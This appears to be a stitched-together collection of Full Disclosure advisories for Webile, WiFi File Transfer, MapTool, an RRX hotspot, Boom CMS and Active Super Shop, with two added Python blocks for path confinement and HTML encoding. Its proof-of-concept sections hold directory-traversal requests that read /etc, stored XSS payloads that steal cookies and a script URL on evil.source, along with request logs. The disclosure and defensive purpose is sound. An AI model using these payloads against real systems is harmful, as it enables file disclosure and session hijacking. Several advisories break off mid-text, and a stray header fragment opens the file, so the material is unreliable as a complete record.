Content-Length: 4829
Origin: https://green-downloads.localhost:8080
Connection: keep-alive
Referer: https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/?page=idcore-settings
Cookie: uap-auth=njqYqYrjVyg7aWCO; __stripe_mid=29
[FD] Webile v1.0.1 - Directory Traversal Web Vulnerability
Document Title:
===============
Webile v1.0.1 - Directory Traversal Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2320

Release Date:
=============
2022-10-10

Vulnerability Laboratory ID (VL-ID):
====================================
2320

Common Vulnerability Scoring System:
====================================
7.3

Vulnerability Class:
====================
Directory- or Path-Traversal

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Webile is a local area network cross-platform file management tool based on the http protocol. Using the personal mobile phone as a server in the local area network, it supports browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data, file statistics, displaying performance, etc. No need to connect to the Internet: you can browse files, send data, play videos and use other functions through a WiFi LAN or mobile phone hotspot, and no additional data traffic is generated during data transmission. Supports Mac, Windows, Linux, iOS, Android and other multi-platform operating systems.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 WiFi mobile web application.

Affected Product(s):
====================
Product Owner: Webile
Product: Webile v1.0.1 - (Framework) (Mobile Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-02-06: Researcher Notification & Coordination (Security Researcher)
2022-02-07: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Open Authentication (Anonymous Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the Webile v1.0.1 WiFi mobile web application. The vulnerability allows remote attackers to change the application path in performed requests to compromise the local application or file-system of a mobile device. Attackers are, for example, able to request environment variables or a sensitive system path.

The directory traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is not securely restricted and validated. This allows an unauthenticated user with WiFi access to request local web-server files without secure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.

Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction. Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.

Proof of Concept (PoC):
=======================
The directory traversal web vulnerability can be exploited by remote attackers without a user account or user interaction.
For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/

--- PoC Session Logs ---
http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6
Upgrade-Insecure-Requests: 1
-
GET: HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Encoding: gzip
Transfer-Encoding: chunked

--- FS Session Logs ---
Output: File name
bluetooth
bpf
carrier
compatconfig
init
permissions
ppp
seccomp_policy
security
selinux
sensors
sysconfig
textclassifier
theme
vintf
epdg
ipm

Security Risk:
==============
The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.

Credits & Auth
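The Webile finding above comes down to a user-controlled filepath value that is joined onto a base directory without a containment check. The following is an added example (not Webile's own code, whose handler is not shown in the advisory) of the two defensive pieces a practitioner would want: a resolver that confines any requested path to one configured base directory, and a request-level detector that flags parent-directory segments, including double-encoded ones, so the PoC request pattern can be picked out of an access log. The base directory name and the sample log lines are constructed for the demonstration.

```python
"""Path-confinement check and a request-level traversal detector.

Added example for the Webile advisory above; it is not Webile's own code.
It assumes a handler that receives a user-supplied ``filepath`` query
parameter (as in the advisory's ``change_upload_dir`` request) and must keep
every resolved path inside one configured base directory.
"""
import os
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit


def resolve_under_base(base_dir: str, user_path: str) -> Optional[str]:
    """Return the absolute path for ``user_path`` if it stays inside
    ``base_dir``, or None when the request would escape it.

    ``user_path`` is always treated as relative to ``base_dir`` (a leading
    separator is stripped so os.path.join cannot be redirected to an absolute
    path), and symlinks are resolved before the containment test so a link
    inside the base cannot point outside it.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_path.lstrip("/\\")))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # paths on different drives (Windows) share no prefix
        inside = False
    return candidate if inside else None


def traversal_in_request(url: str) -> bool:
    """Flag a request whose query values contain a parent-directory segment.

    Values are percent-decoded twice so that a double-encoded ``%252e%252e``
    is caught as well; backslashes are folded into forward slashes before
    splitting into path segments.
    """
    query = urlsplit(url).query
    for values in parse_qs(query, keep_blank_values=True).values():
        for value in values:
            decoded = unquote(unquote(value))
            if ".." in decoded.replace("\\", "/").split("/"):
                return True
    return False


# Constructed sample access-log lines (client, method, request target, status);
# they are not taken from the advisory's session logs.
SAMPLE_ACCESS_LOG = [
    "192.168.43.12 GET /webile_select_dir?t=change_upload_dir&filepath=DCIM/ 200",
    "192.168.43.77 GET /webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/ 200",
    "192.168.43.78 GET /webile_select_dir?t=change_upload_dir&filepath=%252e%252e%2f%252e%252e%2fetc 200",
]


def flag_traversal_clients(lines) -> list:
    """Return the client addresses of log lines whose request target trips the detector."""
    flagged = []
    for line in lines:
        fields = line.split()
        if len(fields) >= 3 and traversal_in_request(fields[2]):
            flagged.append(fields[0])
    return flagged


if __name__ == "__main__":
    print(resolve_under_base("/srv/webile_uploads", "DCIM/photos"))
    print(resolve_under_base("/srv/webile_uploads", "../../../../../../../../../../../../etc/"))
    print(flag_traversal_clients(SAMPLE_ACCESS_LOG))
```

The resolver is the fix: the handler should only ever open the path it returns and should treat None as a 400. The detector is the complementary monitoring rule; it deliberately decodes twice because a single decode is what most servers do before the handler sees the value, and a double-encoded sequence would otherwise slip past a naive substring match on the raw query string.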
[FD] WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities
Document Title:
===============
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:
=============
2022-10-17

Vulnerability Laboratory ID (VL-ID):
====================================
2322

Common Vulnerability Scoring System:
====================================
5.6

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage: https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):
====================
smarterDroid
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Open Authentication (Anonymous Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side.

The vulnerabilities are located in the data_file parameter of the "add a file or folder" and "create a zip file" functions. Attackers with WiFi access are able to use the web UI anonymously and can inject their own malicious script code with a persistent attack vector via a POST method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Proof of Concept (PoC):
=======================
The persistent POST inject web vulnerabilities can be exploited by remote attackers in the same WiFi network with anonymous privileges and low user interaction.
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...
1. Install the mobile android application and start it
2. Start the wifi web-server
3. Login as attacker by the browser over the network
4. Inject payload as folder name, file name or zip file and save via post method request
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload
picture1337.jpg

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---
http://localhost:1234/storage/emulated/0/DCIM/
Host: localhost:1234
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---321836412920954805143620932676
Content-Length: 613
Origin: http://localhost:1234
Connection: keep-alive
Referer: http://localhost:1234/storage/emulated/0/DCIM/
action=mkdir&data_file=New">picture1337.jpg&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/
-
POST: HTTP/1.1 302 OK
Connection: Close
Content-Type: text/html
Location: http://localhost:1234/storage/emulated/0/DCIM/
Content-Length: 143
-
http://localhost:1234/storage/emulated/0/DCIM/
Host: localhost:1234
Accept-Encoding: gzip, deflate
Referer: http://localhost:1234/storage/emulated/0/DCIM/
Connection: keep-alive
-
POST: HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---
http://localhost:1234/storage/emulated/0/Pictures/?
Host: localhost:1234
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---289297208414223233314228108045
Content-Length: 882
Origin: http://localhost:1234
Connection: keep-alive
Referer: http://localhost:1234/storage/emulated/0/Pictures/?
Upgrade-Insecure-Requests: 1
action=multizip&data_file=.File.Zip.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file
-
POST: HTTP/1.1 200 OK
Connection: Close
Content-Type: text/html
Location: http://localhost:1234/storage/emulated/0/Pictures/
Content-Length: 151
-
http://localhost:1234/storage/emulated/0
[FD] MapTool v1.11.5 - Denial of Service Vulnerability
Document Title:
===============
MapTool v1.11.5 - Denial of Service Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2318

Release Date:
=============
2022-10-10

Vulnerability Laboratory ID (VL-ID):
====================================
2318

Common Vulnerability Scoring System:
====================================
5.7

Vulnerability Class:
====================
Denial of Service

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects, and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight. The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds, but for your game where stability matters sticking to the major releases is recommended. MapTool campaigns saved in newer versions may not work on older versions, so be careful with your campaign files when trying out development builds.

(Copy of the Homepage: https://wiki.rptools.info/index.php/MapTool )
(Download Software: https://www.rptools.net/toolbox/download-rptools-products )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a remote denial of service vulnerability in the official MapTool v1.11.5 software.

Affected Product(s):
====================
Rptools
Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)

Vulnerability Disclosure Timeline:
==================================
2022-06-03: Researcher Notification & Coordination (Security Researcher)
2022-06-04: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
The remote denial of service software vulnerability is located in the chat function of the official MapTool v1.11.5 windows software. Attackers with chat access can transmit a malformed, specially crafted payload that returns a null pointer in javax.swing.text.html.StyleSheet (javax.swing.text.View) and javax.swing.text.html.BlockView.layoutMinorAxis. Attackers are able to inject payloads that crash the application immediately and permanently. The compromised communication and project can be saved as a cmpgn file and crashes the application on each import with the unhandled null pointer exception.

Vulnerable Module(s):
[+] Chat (Werkzeuge / Tools)

Vulnerable Function(s):
[+] javax.swing.text.html.StyleSheet$BoxPainter
[+] javax.swing.text.html.BlockView.layoutMinorAxis

Proof of Concept (PoC):
=======================
The remote denial of service vulnerability can be exploited by remote attackers without user interaction or by local users.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability locally:
1. Install the newest maptool version
2. Start the tool and open your own host
3. Open the message chat box
4. Include the payload and push the send button
5. The software crashes locally by null pointer
Note: open the client again and copy the chat with a cmpgn file
6. Now you can locally import it to crash the host via null pointer

Manual steps to reproduce the vulnerability remotely:
1. Install the newest maptool version
2. Start the tool and join an existing party
3. Open the chat
4. Inject the payload with a local js or base64 encoded link and submit it
5. The host receives the chat message and clicks the link; the host session crashes via null pointer

Payload:

PoC: testfile.cmpgn

--- Debug Session Logs ---
java.lang.ArrayIndexOutOfBoundsException: Index 1 out of bounds for length 1
	at java.desktop/javax.swing.text.html.BlockView.layoutMinorAxis(Unknown Source)
	at java.desktop/javax.swing.text.html.HTMLEditorKit$HTMLFactory$BodyBlockView.layoutMinorAxis(Unknown Source)
	at java.desktop/javax.swing.text.BoxView.setSpanOnAxis(Unknown Source)
	at ja
[FD] MapTool v1.11.5 - Cross Site Scripting Vulnerabilities
Document Title:
===============
MapTool v1.11.5 - Cross Site Scripting Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2319

Release Date:
=============
2022-10-11

Vulnerability Laboratory ID (VL-ID):
====================================
2319

Common Vulnerability Scoring System:
====================================
5.6

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
MapTool is a fully featured, flexible virtual tabletop. Not only does MapTool come with powerful tools for creating detailed maps but also a chat function, an initiative tracker, and a detailed token management system to create characters, monsters, objects, and anything you can imagine. MapTool's user interface is highly configurable, and features not being used can be hidden out of sight. The latest version of MapTool can be found on GitHub. MapTool attempts to use Semantic Versioning to help groups know whether a change may break their game or not so they can decide when to upgrade. Exciting new features can be tested in development (alpha or beta) builds, but for your game where stability matters sticking to the major releases is recommended. MapTool campaigns saved in newer versions may not work on older versions, so be careful with your campaign files when trying out development builds.

(Copy of the Homepage: https://wiki.rptools.info/index.php/MapTool )
(Download Software: https://www.rptools.net/toolbox/download-rptools-products )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent web vulnerability in the official MapTool v1.11.5 software.

Affected Product(s):
====================
Rptools
Product: MapTool v1.11.5 - (Windows) (Linux) (MacOS)

Vulnerability Disclosure Timeline:
==================================
2022-06-03: Researcher Notification & Coordination (Security Researcher)
2022-06-04: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-11: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the official MapTool v1.11.5 software. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side.

The vulnerability is located in the Speicher den Nachrichtenverlauf (Save Message Logs) function, which exports without secure encoding of html entities. This allows remote attackers to send malicious payloads that are not visible in the chat but are saved to the exported html file. Opening the html file directly executes the injected script code payloads on the local computer system. The vulnerability can be used by actors to form malicious files for malware, phishing or data exfiltration after local compromise.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Vulnerable Module(s):
[+] Chat

Affected Module(s):
[+] Speicher den Nachrichtenverlauf

Proof of Concept (PoC):
=======================
The persistent and non-persistent input validation web vulnerabilities can be exploited by remote attackers without a user account and with or without low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

PoC: Payload
http://evil.source/malicious.jsp?inject=eval(name)" name="alert(1337)">

Manual steps to reproduce the vulnerability:
1. Install the linux, windows or macos map software
2. Open the chat and inject payload
3. Send the input to execute
4. Save the chat logs by settings (default html)
5. Open the exported html file with the chat communication
Note: Opening the file directly executes the payload
6. Successful reproduce of the non-persistent and persistent input validation vulnerability

PoC: Exploitation (test.html)
Anonymer Benutzer: evil.source[MALICIOUS SCRIPT CODE EXECUTION POINT]
"antlr.collections.AST.equalsTree(antlr.collections.AST)"
[FD] RRX IOB LP v1.0 - DNS Cache Snooping Vulnerability
Document Title:
===============
RRX IOB LP v1.0 - DNS Cache Snooping Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2261

Article: https://www.vulnerability-db.com/?q=articles/2022/10/11/rhein-ruhr-express-rrx-dns-cache-snooping-vulnerability-wifi-hotspot

Release Date:
=============
2022-10-11

Vulnerability Laboratory ID (VL-ID):
====================================
2261

Common Vulnerability Scoring System:
====================================
5.3

Vulnerability Class:
====================
Multiple

Current Estimated Price:
========================
2.000€ - 3.000€

Product & Service Introduction:
===============================
This product, solution or service ("Product") contains third-party software components listed in this document. These components are Open Source Software licensed under a license approved by the Open Source Initiative (www.opensource.org) or similar licenses as determined by SIEMENS ("OSS") and/or commercial or freeware software components. With respect to the OSS components, the applicable OSS license conditions prevail over any other terms and conditions covering the Product. The OSS portions of this Product are provided royalty-free and can be used at no charge.

If SIEMENS has combined or linked certain components of the Product with/to OSS components licensed under the GNU LGPL version 2 or later as per the definition of the applicable license, and if use of the corresponding object file is not unrestricted ("LGPL Licensed Module", whereas the LGPL Licensed Module and the components that the LGPL Licensed Module is combined with or linked to is the "Combined Product"), the following additional rights apply, if the relevant LGPL license criteria are met: (i) you are entitled to modify the Combined Product for your own use, including but not limited to the right to modify the Combined Product to relink modified versions of the LGPL Licensed Module, and (ii) you may reverse-engineer the Combined Product, but only to debug your modifications. The modification right does not include the right to distribute such modifications and you shall maintain in confidence any information resulting from such reverse-engineering of a Combined Product.

Certain OSS licenses require SIEMENS to make source code available, for example, the GNU General Public License, the GNU Lesser General Public License and the Mozilla Public License. If such licenses are applicable and this Product is not shipped with the required source code, a copy of this source code can be obtained by anyone in receipt of this information during the period required by the applicable OSS licenses by contacting the following address.

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a dns snooping vulnerability in the Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal.

Vulnerability Disclosure Timeline:
==================================
2020-08-03: Researcher Notification & Coordination (Security Researcher)
2020-08-04: Vendor Notification (Security Department)
2020-08-27: Vendor Response/Feedback #1 (Security Department)
2020-11-10: Vendor Response/Feedback #2 (Security Department)
2021-01-30: Security Acknowledgements (Security Department)
2022-10-09: Vendor Fix/Patch by Check (Service Developer Team)
2022-10-11: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Guest Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A dns cache snooping vulnerability has been discovered in the official Rhein Ruhr Express (RRX IOB Landing Page 1.0 - Open Source Software) with Hotspot Siemens Portal. The vulnerability allows remote attackers to determine resolved sites and name servers to follow up with manipulative interactions.

The vulnerability allows remote attackers to determine which domains have recently been resolved via this name server, and therefore which hosts have been recently visited. For instance, if an attacker was interested in whether your company utilizes the online services of a particular financial institution, they would be able to use this attack to build a statistical model regarding company usage of that financial institution. Of course, the attack can also be used to find B2B partners, web-surfing patterns, external mail servers, and more. If this is an internal DNS server not accessible to outside networks, attacks would be limited to the internal network. This may include employees, consultants and potentially users on a guest network or WiFi co
[FD] Boom CMS v8.0.7 - Cross Site Scripting Vulnerability
Document Title:
===============
Boom CMS v8.0.7 - Cross Site Scripting Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2274

Release Date:
=============
2023-07-03

Vulnerability Laboratory ID (VL-ID):
====================================
2274

Common Vulnerability Scoring System:
====================================
5.3

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Boom is a fully featured, easy to use CMS. More than 10 years, and many versions later, Boom is an intuitive, WYSIWYG CMS that makes life easy for content editors and website managers. Working with BoomCMS is simple. It's easy and quick to learn and start creating content. It gives editors control but doesn't require any technical knowledge.

(Copy of the Homepage: https://www.boomcms.net/boom-boom )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting vulnerability in the Boom CMS v8.0.7 web-application.

Affected Product(s):
====================
UXB London
Product: Boom v8.0.7 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-07-24: Researcher Notification & Coordination (Security Researcher)
2022-07-25: Vendor Notification (Security Department)
2023-**-**: Vendor Response/Feedback (Security Department)
2023-**-**: Vendor Fix/Patch (Service Developer Team)
2023-**-**: Security Acknowledgements (Security Department)
2023-07-03: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent script code injection web vulnerability has been discovered in the official Boom CMS v8.0.7 web-application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser to web-application requests from the application-side.

The vulnerability is located in the input fields of the album title and album description in the asset-manager module. Attackers with low privileges are able to add their own malformed albums with malicious script code in the title and description. After the injection the albums are displayed in the backend, where the execution takes place on preview of the main assets. The attack vector of the vulnerability is persistent and the request method to inject is POST. The validation tries to sanitize the content by prefixing a backslash. This has no effect on injecting malicious JavaScript, because it is only applied to double and single quotes to prevent SQL injection.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] assets-manager (album)

Vulnerable Function(s):
[+] add

Vulnerable Parameter(s):
[+] title
[+] description

Affected Module(s):
[+] Frontend (Albums)
[+] Backend (Albums Assets)

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Login to the application as restricted user
2. Create a new album
3. Inject a test script code payload to title and description
4. Save the request
5. Preview frontend (albums) and backend (assets-manager & albums listing) to provoke the execution
6. Successful reproduce of the persistent cross site web vulnerability!

Payload(s):
alert(document.cookie)
test

--- PoC Session Logs (Inject) ---
https://localhost:8000/boomcms/album/35
Host: localhost:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 263
Origin: https://localhost:8000
Connection: keep-alive
Referer: https://localhost:8000/boomcms/asset-manager/albums/[evil.source]
Sec-Fetch-Site: same-origin
{"asset_count":1,"id":35,"name":""><[INJECTED SCRIPT CODE PAYLOAD 1!]>","description":""><[INJECTED SCRIPT CODE PAYL
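Two of the advisories above share one root cause: the MapTool chat export writes user text into an HTML file without entity encoding, and the Boom CMS album fields run the stored title and description through a backslash filter meant for SQL string literals, which leaves HTML metacharacters untouched. The following added example (not code from MapTool, Boom CMS or the advisory) makes that difference measurable. It re-implements PHP's addslashes() behaviour in Python so a SQL-style escaper and an HTML entity encoder can be applied to the same template, then uses the standard-library HTML tokenizer to count which start tags a browser would see; the template and the two test inputs are constructed for the demonstration.

```python
"""Why backslash-escaping does not stop HTML injection, and what does.

Added example for the MapTool "Save Message Logs" export and the Boom CMS
album title/description findings above; it is not code from either project.
``addslashes`` below re-implements the behaviour of PHP's addslashes() in
Python so the two filters can be compared on the same template.
"""
import html
from html.parser import HTMLParser


def addslashes(value: str) -> str:
    """Backslash-escape quotes, backslashes and NUL, like PHP's addslashes().

    This targets string literals in SQL; in an HTML context the backslash is
    an ordinary character, so '"' still closes an attribute and '<' still
    opens a tag.
    """
    out = []
    for ch in value:
        if ch in ('"', "'", "\\"):
            out.append("\\" + ch)
        elif ch == "\0":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def html_encode(value: str) -> str:
    """Entity-encode the HTML metacharacters, including both quote styles."""
    return html.escape(value, quote=True)


# A minimal stand-in for a page that echoes a stored album title and
# description (or an exported chat line) back into HTML.
TEMPLATE = (
    '<div class="album">'
    '<input name="title" value="{title}">'
    '<p class="description">{description}</p>'
    '</div>'
)


def render(title: str, description: str, escape) -> str:
    return TEMPLATE.format(title=escape(title), description=escape(description))


class _StartTags(HTMLParser):
    """Collects the start tags the browser's tokenizer would see."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def start_tags(fragment: str) -> list:
    parser = _StartTags()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def injected_tags(title: str, description: str, escape) -> list:
    """Tags present after rendering that the empty template does not contain.

    A non-empty result means the user data broke out of its text or
    attribute context and created new markup, i.e. the filter failed.
    """
    baseline = set(start_tags(render("", "", escape)))
    return sorted(set(start_tags(render(title, description, escape))) - baseline)


# Constructed test inputs in the spirit of the advisories' payloads.
TITLE_PAYLOAD = '"><script>alert(document.cookie)</script>'
DESCRIPTION_PAYLOAD = '<b onmouseover="alert(1337)">test</b>'


if __name__ == "__main__":
    print("addslashes :", injected_tags(TITLE_PAYLOAD, DESCRIPTION_PAYLOAD, addslashes))
    print("html_encode:", injected_tags(TITLE_PAYLOAD, DESCRIPTION_PAYLOAD, html_encode))
```

With the backslash filter the tokenizer reports new `script` and `b` tags, because `\"` still contains a quote that terminates the value attribute; with entity encoding the rendered fragment contains only the template's own tags. The same check works as a regression test for any export or preview path: render a fixture through the real template and assert that `injected_tags` is empty.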
[FD] Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities
Document Title:
===============
Active Super Shop CMS v2.5 - HTML Injection Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2278

Release Date:
=============
2023-07-04

Vulnerability Laboratory ID (VL-ID):
====================================
2278

Common Vulnerability Scoring System:
====================================
5.4

Vulnerability Class:
====================
Script Code Injection

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
https://codecanyon.net/item/active-super-shop-multivendor-cms/12124432

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple html injection vulnerabilities in the Active Super Shop Multi-vendor CMS v2.5 web-application.

Affected Product(s):
====================
ActiveITzone
Product: Active Super Shop CMS v2.5 (CMS) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-20: Researcher Notification & Coordination (Security Researcher)
2021-08-21: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2023-07-05: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple html injection web vulnerabilities have been discovered in the official Active Super Shop Multi-vendor CMS v2.5 web-application. The web vulnerability allows remote attackers to inject their own html code with a persistent vector to manipulate application content.

The persistent html injection web vulnerabilities are located in the name, phone and address parameters of the manage profile and products branding module. Remote attackers with privileged accountant access are able to inject their own malicious script code in the name parameter to provoke a persistent execution on profile view or products preview listing. There are 3 different privileges that are allowed to access the backend: the accountant (low privileges), the manager (medium privileges) and the admin (high privileges). Accountants are able to attack the higher privileged access roles of admins and managers on preview of the elements in the backend to compromise the application. The request method to inject is POST and the attack vector is persistent, located on the application-side.

Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Manage Details

Vulnerable Parameter(s):
[+] name
[+] phone
[+] address

Affected Module(s):
[+] manage profile
[+] products branding

Proof of Concept (PoC):
=======================
The html injection web vulnerabilities can be exploited by remote attackers with privileged accountant access and with low user interaction.
For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
https://[DOMAIN]/[PATH]/[PICTURE].*";>

Vulnerable Source: manage_admin & branding
Manage Details
https://assm_cms.localhost:8080/shop/admin/manage_admin/update_profile/"; class="form-horizontal" method="post" accept-charset="utf-8">
Name
https://MALICIOUS-DOMAIN.com/gfx/logo-header.png";>" id="demo-hor-1" class="form-control required">
Email
Phone
